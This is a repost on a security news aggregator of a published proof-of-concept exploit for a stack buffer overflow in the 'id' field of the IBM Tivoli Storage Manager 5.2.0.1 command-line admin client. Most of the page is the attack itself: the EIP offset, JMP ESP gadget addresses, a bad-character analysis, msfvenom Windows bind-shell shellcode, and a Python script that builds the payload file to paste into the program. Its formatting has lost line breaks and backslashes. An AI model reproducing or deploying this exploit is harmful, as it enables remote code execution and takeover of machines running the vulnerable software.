HackDig : Dig high-quality web security articles for hackers

IBM Tivoli Storage Manager 5.2.0.1 Buffer Overflow

2020-11-21 04:51
# Exploit Title: IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow# Exploit Author: Paolo Stagno aka VoidSec# Vendor Homepage: https://www.ibm.com/support/knowledgecenter/en/SSGSG7_7.1.0/com.ibm.itsm.tsm.doc/welcome.html# Version: 5.2.0.1# Tested on: Windows 10 Pro v.10.0.19041 Build 19041"""Usage:              IBM Tivoli Storage Manager > in the "id" field paste the content of "IBM_TSM_v.5.2.0.1_exploit.txt" and press "ENTER"PS C:UsersuserDesktop> Import-Module .Get-PESecurity.psm1PS C:UsersuserDesktop> Get-PESecurity -file "dsmadmc.exe"                   FileName         : dsmadmc.exeARCH             : I386DotNET           : FalseASLR             : TrueDEP              : TrueAuthenticode     : FalseStrongNaming     : N/ASafeSEH          : FalseControlFlowGuard : FalseHighentropyVA    : False"""# [ buffer                              ]# [ 68 byte | EIP | rest of the buffer  ]#                   ^_ESP"""EIP contains normal pattern : 0x33634132 (offset 68)ESP (0x0019e314) points at offset 72 in normal pattern (length 3928)JMP ESP Pointers:0x028039eb : jmp esp |  {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.00x02803d7b : jmp esp |  {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0 0x02852c21 : jmp esp |  {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.00x0289fbe3 : call esp |  {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.00x0289fd2f : call esp |  {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.00x028823a9 : push esp # ret 0x04 |  {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0"""#!/usr/bin/pythonimport struct# 4000 bytesbuff_max_length=800eip_offset=68"""BAD CHARS:x00x08x09x0ax0dx1ax1bx7fGOOD CHARS:     asciiprint x20-x7eMOD CHARS: x00 -> x20       ,-----------------------------------------------.       | Comparison results:                           |       |-----------------------------------------------|       |                        80 81 82 83 84 85 86 87| File       |                        3f 3f 2c 9f 2c 2e 2b d8| Memory    80 |88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97| File       |5e 25 53 3c 4f 3f 5a 3f 3f 60 27 22 22 07 2d 2d| Memory    90 |98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7| File       |7e 54 73 3e 6f 3f 7a 59 20 ad 9b 9c 0f 9d dd 15| Memory    a0 |a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7| File       |22 63 a6 ae aa 2d 72 5f f8 f1 fd 33 27 e6 14 fa| Memory    b0 |b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7| File       |2c 31 a7 af ac ab 5f a8 41 41 41 41 8e 8f 92 80| Memory    c0 |c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7| File       |45 90 45 45 49 49 49 49 44 a5 4f 4f 4f 4f 99 78| Memory    d0 |d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7| File       |4f 55 55 55 9a 59 5f e1 85 a0 83 61 84 86 91 87| Memory    e0 |e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7| File       |8a 82 88 89 8d a1 8c 8b 64 a4 95 a2 93 6f 94 f6| Memory    f0 |f8 f9 fa fb fc fd fe ff                        | File       |6f 97 a3 96 81 79 5f 98                        | Memory       `-----------------------------------------------'"""# msfvenom -p windows/shell_bind_tcp -f python -v shellcode -a x86 --platform windows -b "x00x08x09x0ax0dx1ax1bx7f" -e x86/alpha_mixed BufferRegister=ESP --smallestshellcode =  b""shellcode += b"x54x59x49x49x49x49x49x49x49x49x49"shellcode += b"x49x49x49x49x49x49x49x37x51x5ax6a"shellcode += b"x41x58x50x30x41x30x41x6bx41x41x51"shellcode += b"x32x41x42x32x42x42x30x42x42x41x42"shellcode += b"x58x50x38x41x42x75x4ax49x78x59x78"shellcode += b"x6bx4dx4bx6bx69x62x54x61x34x6ax54"shellcode += b"x76x51x6ax72x6cx72x54x37x45x61x4f"shellcode += b"x39x61x74x4ex6bx62x51x66x50x6cx4b"shellcode += b"x53x46x34x4cx6cx4bx32x56x35x4cx6e"shellcode += b"x6bx67x36x37x78x6ex6bx43x4ex51x30"shellcode += b"x4cx4bx67x46x74x78x50x4fx72x38x42"shellcode += b"x55x6cx33x30x59x56x61x38x51x39x6f"shellcode += b"x49x71x73x50x4ex6bx70x6cx31x34x54"shellcode += b"x64x6ex6bx73x75x67x4cx4ex6bx66x34"shellcode += b"x46x48x74x38x45x51x69x7ax4cx4bx31"shellcode += b"x5ax67x68x6ex6bx42x7ax51x30x46x61"shellcode += b"x6ax4bx68x63x36x54x47x39x6cx4bx35"shellcode += b"x64x6cx4bx67x71x5ax4ex74x71x6bx4f"shellcode += b"x64x71x6fx30x59x6cx6cx6cx6fx74x39"shellcode += b"x50x50x74x43x37x49x51x58x4fx34x4d"shellcode += b"x77x71x6fx37x5ax4bx6cx34x35x6bx53"shellcode += b"x4cx35x74x35x78x73x45x48x61x6cx4b"shellcode += b"x42x7ax75x74x66x61x5ax4bx50x66x4c"shellcode += b"x4bx46x6cx70x4bx4ex6bx31x4ax77x6c"shellcode += b"x76x61x68x6bx4ex6bx53x34x6cx4bx53"shellcode += b"x31x4ax48x4ex69x37x34x56x44x65x4c"shellcode += b"x70x61x38x43x4fx42x45x58x61x39x38"shellcode += b"x54x6fx79x48x65x4fx79x59x52x43x58"shellcode += b"x4cx4ex32x6ex36x6ex7ax4cx72x72x49"shellcode += b"x78x4fx6fx4bx4fx6bx4fx6bx4fx4ex69"shellcode += b"x42x65x54x44x6fx4bx73x4ex68x58x4b"shellcode += b"x52x44x33x6cx47x75x4cx37x54x42x72"shellcode += b"x4dx38x6ex6ex69x6fx59x6fx49x6fx6d"shellcode += b"x59x57x35x73x38x70x68x32x4cx52x4c"shellcode += b"x67x50x71x51x75x38x65x63x76x52x76"shellcode += b"x4ex42x44x61x78x34x35x54x33x71x75"shellcode += b"x73x42x70x30x79x4bx6bx38x61x4cx31"shellcode += b"x34x57x7ax4cx49x59x76x31x46x69x6f"shellcode += b"x33x65x67x74x4fx79x6ax62x32x70x6d"shellcode += b"x6bx4dx78x6fx52x42x6dx4fx4cx6fx77"shellcode += b"x55x4cx75x74x53x62x79x78x61x4fx79"shellcode += b"x6fx6bx4fx79x6fx30x68x42x4fx62x58"shellcode += b"x63x68x77x50x73x58x70x61x30x67x33"shellcode += b"x55x50x42x43x58x32x6dx70x65x61x63"shellcode += b"x32x53x76x51x69x4bx6dx58x33x6cx51"shellcode += b"x34x35x5ax4bx39x6bx53x72x48x70x58"shellcode += b"x47x50x55x70x57x50x42x48x62x50x63"shellcode += b"x47x70x6ex35x34x34x71x6fx39x4cx48"shellcode += b"x30x4cx74x64x67x74x6ex69x4bx51x54"shellcode += b"x71x58x52x62x72x36x33x62x71x71x42"shellcode += b"x79x6fx68x50x74x71x79x50x76x30x69"shellcode += b"x6fx50x55x54x48x41x41"buff = ""buff += "A" * eip_offsetbuff += struct.pack("<I",0x02c73d7b) #  0x02803d7b cause char modification needs to be written as 0x02c73d7bbuff += shellcodebuff += "C" * (buff_max_length - len(buff))print("Writing {} bytes".format(len(buff)))f = open("IBM_TSM_v.5.2.0.1_exploit.txt", "w")f.write(buff)f.close()


Source: 3610110202-BLW/eussi/moc.ytirucesxc

Read:154 | Comments:0 | Tags:No Tag

“IBM Tivoli Storage Manager 5.2.0.1 Buffer Overflow”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Tools